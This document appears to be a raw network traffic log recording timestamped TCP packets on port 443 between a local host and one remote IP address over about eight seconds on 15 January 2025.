                                                                            Jan 15, 2025 09:02:40.133850098 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.133858919 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.133900881 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.133905888 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.133929968 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.133939028 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.133946896 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.133959055 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.133966923 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.133984089 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134001017 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134016037 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134016991 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134028912 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134048939 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134048939 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134068012 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134080887 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134084940 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134097099 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134114981 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134115934 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134139061 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134147882 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134160995 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134164095 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134193897 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134203911 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134212017 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134226084 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134241104 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134246111 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134258986 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134275913 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134277105 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134289980 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134304047 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134306908 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134321928 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134335995 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134349108 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134357929 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134391069 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134399891 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134423971 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134438038 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134450912 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134489059 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134495974 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134502888 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134531975 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134548903 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134567022 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134572983 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134587049 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134617090 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134660959 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134661913 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134674072 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134706974 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134716988 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134763002 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134763002 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134774923 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134804964 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134819984 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134865999 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134871960 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134884119 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134921074 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134943962 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.134989977 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.134990931 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135004044 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135034084 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.135047913 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135092974 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.135096073 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135107040 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135142088 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.135152102 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135204077 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.135205030 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135217905 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135251999 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.135262966 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135308027 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135308981 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.135333061 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.135354996 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.175394058 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.175401926 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.175462008 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.391334057 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.392225981 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.650181055 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.650211096 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.650269032 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.660348892 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.660356045 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660367012 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660409927 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660433054 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.660440922 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660466909 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660480022 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.660500050 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660516977 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660550117 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.660559893 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660573959 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660612106 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660617113 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660624027 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.660631895 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660636902 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.660640955 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660664082 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.660746098 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.660803080 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:40.871335030 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:40.871963024 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.067807913 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.067874908 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.067959070 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070347071 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070365906 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070389032 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070435047 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070450068 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070482016 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070506096 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070522070 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070549011 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070549965 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070564985 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070590973 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070615053 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070640087 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070640087 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070657969 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070688963 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070718050 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070743084 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070744038 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070744038 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070760012 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070791960 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070827961 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070852995 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070895910 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070897102 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070897102 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070897102 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.070914984 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.070941925 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.071012974 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.071012974 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.071042061 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.245100975 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.245172024 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.245251894 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.248086929 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.248100042 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.248135090 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.248212099 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.248256922 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.248316050 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.248372078 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.248372078 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.248433113 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.248467922 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.455334902 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.465225935 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.465272903 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.465331078 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.469621897 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.469634056 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.469675064 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.469712019 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.469764948 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.469801903 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.469850063 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.469850063 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.469933987 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.469994068 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.675333977 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.722274065 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.722304106 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.722362041 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.726756096 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.726759911 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.726784945 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.726804018 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.726927042 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.726963043 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.727026939 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.727039099 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.727154970 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.727210045 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.935331106 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.935409069 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.998369932 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:41.998383045 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:41.998436928 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.002537012 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.002540112 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.002553940 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.002573013 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.002639055 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.002661943 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.002686977 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.002701044 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.002756119 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.002835989 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.207360983 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.209698915 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.291508913 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.291536093 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.291584969 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.296046972 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.296051025 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.296076059 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.296109915 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.296139002 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.296176910 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.296205044 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.296210051 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.296224117 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.296263933 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.296308994 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.503366947 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.503418922 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.645844936 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.645863056 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.645910978 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.652271032 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.652276039 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.652287006 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.652303934 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.652321100 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.652338982 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.652347088 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.652352095 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.652439117 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.652508974 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.652556896 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:42.859334946 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:42.859380960 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.148956060 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.148979902 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.149029970 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.156251907 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.156255960 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.156266928 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.156306982 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.156311035 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.156399965 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.156403065 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.156414986 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.156447887 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.156454086 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.156471014 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.156562090 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.156562090 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.156627893 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.363321066 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.363388062 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.611251116 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.611280918 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.611356020 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.618362904 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.618366957 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.618377924 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.618418932 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.618439913 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.618453026 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.618457079 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.618551970 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.618560076 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.618572950 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:43.618617058 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:43.618678093 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:44.413036108 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:44.420803070 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:44.815128088 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:44.815211058 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:44.815247059 CET49741443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:44.815264940 CET4434974139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:44.934531927 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:44.934648037 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:44.934727907 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:44.935125113 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:44.935162067 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.198633909 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.198704004 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.199309111 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.199450016 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.202728033 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.202738047 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.202953100 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.203679085 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.247332096 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.549829006 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.549854040 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.550062895 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.550096035 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.550149918 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.551508904 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.551564932 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.553251982 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.553306103 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.555217028 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.555274963 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.641930103 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.642009974 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.642015934 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.642050028 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.642071962 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.642082930 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.642091036 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.642096996 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.642122030 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.642177105 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.642225027 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.642463923 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.642482996 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.642498016 CET49742443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.642504930 CET4434974239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.656064987 CET49743443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.656126976 CET4434974339.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:46.656207085 CET49743443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.656526089 CET49743443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:46.656538963 CET4434974339.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:47.912084103 CET4434974339.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:47.912209988 CET49743443192.168.2.439.103.20.17
